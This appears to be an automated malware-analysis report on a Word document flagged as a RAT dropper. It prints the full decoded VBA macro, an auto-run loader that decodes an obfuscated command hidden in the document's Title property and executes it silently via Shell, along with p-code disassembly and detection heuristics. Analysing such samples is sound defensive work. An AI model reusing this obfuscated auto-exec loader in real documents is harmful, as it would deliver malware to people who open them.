Verdict: MALICIOUS
Risk Score: 230
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample contains a VBA macro that is triggered by the Document_Open event. This macro decodes a string and uses the Shell() function to execute it, likely downloading and running a second-stage payload. The ClamAV detection name 'Doc.Dropper.ImminentMonitorRAT-10018167-0' further supports its nature as a dropper.
Heuristics (8)
- ClamAV: Doc.Dropper.ImminentMonitorRAT-10018167-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.ImminentMonitorRAT-10018167-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched lines in script:
    ltrbknyfz = StrConv(karsri, vbUnicode)
    Shell (Replace(Replace(Split(ltrbknyfz, Chr(124))(1), Split(ltrbknyfz, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.path & Application.PathSeparator & ActiveDocument.Name)), 0
    End Sub
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low, OLE_VBA_DOCOPEN]: Document_Open macro. Matched lines in script:
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    efsv = ThisDocument.BuiltInDocumentProperties("Tit" + "le")
- NOP-equivalent sled detected [medium, SC_NOP_EQUIV_SLED]: Long run of 0x61 bytes
    Disassembly: attempted x86 opcode disassembly of the run decodes as 0x61 (popal) at every offset from 00004708 through 00004767.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2733 bytes | e4fab99b1e601be23aea38196e337d6138c32ba2df684e6edf3c1bb9c08b521c |
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
' The encoded command is stored in the document's Title property;
' "Tit" + "le" splits the property name to evade simple string matching.
efsv = ThisDocument.BuiltInDocumentProperties("Tit" + "le")
Dim ltrbknyfz As String
Dim shmoo As String
' Decoding step 1: reverse the string.
shmoo = StrReverse(efsv)
Dim karsri() As Byte
karsri = StrConv(shmoo, vbFromUnicode)
Dim tdqdokgvtdus As Long
' Decoding step 2: subtract 7 (written as -9 + 2) from every byte.
For tdqdokgvtdus = 0 To UBound(karsri)
karsri(tdqdokgvtdus) = karsri(tdqdokgvtdus) - 9 + 2
Next tdqdokgvtdus
ltrbknyfz = StrConv(karsri, vbUnicode)
' Decoded text has the form "<token>|<command>": every occurrence of <token> in
' <command> is replaced with ".", "FPATH" is replaced with this document's full path,
' and the result is executed via Shell with window style 0 (hidden).
Shell (Replace(Replace(Split(ltrbknyfz, Chr(124))(1), Split(ltrbknyfz, Chr(124))(0), Chr(46)), "FP" + "ATH", ActiveDocument.path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub
' Processing file: /tmp/qstore_whyi1s96
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4190 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' LitStr 0x0003 "Tit"
' LitStr 0x0002 "le"
' Add
' Ld ThisDocument
' ArgsMemLd BuiltInDocumentProperties 0x0001
' St hlitb
' Line #2:
' Dim
' VarDefn efsv (As String)
' Line #3:
' Dim
' VarDefn ltrbknyfz (As String)
' Line #4:
' Ld hlitb
' ArgsLd StrReverse 0x0001
' St ltrbknyfz
' Line #5:
' Dim
' VarDefn shmoo (As Byte)
' Line #6:
' Ld ltrbknyfz
' Ld vbFromUnicode
' ArgsLd StrConv 0x0002
' St shmoo
' Line #7:
' Dim
' VarDefn karsri (As Long)
' Line #8:
' StartForVariable
' Ld karsri
' EndForVariable
' LitDI2 0x0000
' Ld shmoo
' FnUBound 0x0000
' For
' Line #9:
' Ld karsri
' ArgsLd shmoo 0x0001
' LitDI2 0x0009
' Sub
' LitDI2 0x0002
' Add
' Ld karsri
' ArgsSt shmoo 0x0001
' Line #10:
' StartForVariable
' Ld karsri
' EndForVariable
' NextVar
' Line #11:
' Ld shmoo
' Ld vbUnicode
' ArgsLd StrConv 0x0002
' St efsv
' Line #12:
' LitDI2 0x0001
' Ld efsv
' LitDI2 0x007C
' ArgsLd Chr 0x0001
' ArgsLd Split 0x0002
' IndexLd 0x0001
' LitDI2 0x0000
' Ld efsv
' LitDI2 0x007C
' ArgsLd Chr 0x0001
' ArgsLd Split 0x0002
' IndexLd 0x0001
' LitDI2 0x002E
' ArgsLd Chr 0x0001
' ArgsLd Replace 0x0003
' LitStr 0x0002 "FP"
' LitStr 0x0003 "ATH"
' Add
' Ld ActiveDocument
' MemLd path
' Ld Application
' MemLd PathSeparator
' Concat
' Ld ActiveDocument
' MemLd Name
' Concat
' ArgsLd Replace 0x0003
' Paren
' LitDI2 0x0000
' ArgsCall Shell 0x0002
' Line #13:
' EndSub
```